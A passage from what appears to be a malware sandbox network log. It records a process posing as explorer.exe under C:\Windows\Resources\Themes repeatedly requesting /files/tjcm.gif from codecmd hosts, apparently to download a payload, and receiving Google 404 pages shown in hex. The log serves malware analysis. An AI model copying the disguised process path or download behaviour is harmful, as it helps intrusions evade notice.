                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:07.186244011 CEST2681INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                23192.168.2.549875142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:08.679080009 CEST2682OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd03.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:08.708112955 CEST2683INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:08 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:08.708139896 CEST2684INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                24192.168.2.549876142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:10.971801043 CEST2684OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd01.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:10.998584032 CEST2686INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:10 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:10.998608112 CEST2686INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                25192.168.2.549877142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:12.329263926 CEST2687OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd02.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:12.355820894 CEST2688INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:12 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 